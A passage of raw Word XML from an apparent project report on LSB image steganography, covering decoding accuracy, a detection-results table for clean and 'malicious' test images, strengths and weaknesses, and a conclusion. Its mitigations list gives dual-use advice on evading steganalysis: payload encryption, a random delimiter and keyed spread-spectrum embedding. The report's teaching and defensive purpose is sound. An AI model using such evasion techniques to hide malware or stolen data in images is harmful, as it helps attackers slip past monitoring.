      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8.2  Decoding Accuracy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The automated test suite confirms 100% round-trip fidelity: the decoded string matches the original secret message character-for-character for all test cases, including messages containing special characters, spaces, and punctuation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8.3  Detection Results on the Test Suite</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>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Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E75B6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detection Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>clear_1.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="37863D"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLEAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>✔  CLEAN — no hidden data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>clear_2.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="37863D"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLEAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>✔  CLEAN — no hidden data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>malicious_1.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE9E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HIDDEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>✔  HIDDEN — reverse shell payload detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>malicious_2.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE9E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HIDDEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>✔  HIDDEN — stolen credentials detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>malicious_3.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE9E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HIDDEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>✔  HIDDEN — C2 download command detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>9. SECURITY ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9.1  Strengths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Invisibility: The ±1 LSB modification is undetectable by casual visual inspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Format preservation: Output in lossless PNG guarantees payload integrity across transfers and storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Simplicity: The tool is compact, dependency-light, and easy to audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Detection capability: Built-in steganalysis enables defenders to screen untrusted images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9.2  Limitations &amp; Known Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Signature-based detection only: Any attacker who changes the delimiter string bypasses the detector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No encryption: The hidden payload is plaintext. Combining LSB encoding with AES encryption would be far more secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Statistical detectability: LSB steganography produces subtle statistical anomalies in the LSB plane that are detectable by chi-square or RS steganalysis tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JPEG vulnerability: Accidentally resaving the output as JPEG would destroy the hidden data due to lossy compression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capacity constraint: Large messages require large carrier images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9.3  Potential Mitigations &amp; Extensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Encrypt the payload (e.g., Fernet/AES-GCM) before encoding to ensure confidentiality even if detection occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use a random or user-defined delimiter instead of the hardcoded ###END###.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement spread-spectrum LSB: scatter bits pseudo-randomly across pixels using a key, increasing resistance to statistical steganalysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add a GUI (Tkinter / web interface) for non-technical users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Extend to audio steganography using WAV LSB modification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>10. CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This project successfully demonstrates the Least Significant Bit steganography technique in Python. By embedding secret messages in the pixel channels of PNG/JPG images, the tool achieves covert communication that is effectively invisible to human observers. All three functions — encoding, decoding, and detection — were implemented, tested, and verified through an automated test suite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The project highlights both the power and the danger of steganography: it is a legitimate tool for digital watermarking and privacy, yet the same technique is actively exploited by threat actors to conceal malware payloads, exfiltrate credentials, and relay command-and-control instructions inside ordinary-looking images. Understanding the mechanics is therefore essential for security practitioners responsible for network monitoring, digital forensics, and threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Future work should focus on adding payload encryption, implementing statistical steganalysis defences, and extending the tool to other carrier media such as audio and video files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>11. REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[1]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anderson, R. &amp; Petitcolas, F. (1998). On the limits of steganography. IEEE Journal on Selected Areas in Communications, 16(4), 474–481.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[2]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Chandramouli, R. &amp; Memon, N. (2001). Analysis of LSB based image steganography techniques. IEEE ICIP Proceedings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[3]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pillow (PIL Fork) Documentation. https://pillow.readthedocs.io/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[4]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NIST SP 800-53 Rev. 5 – Security and Privacy Controls for Information Systems and Organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[5]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Provos, N. &amp; Honeyman, P. (2003). Hide and seek: An introduction to steganography. IEEE Security &amp; Privacy, 1(3), 32–44.</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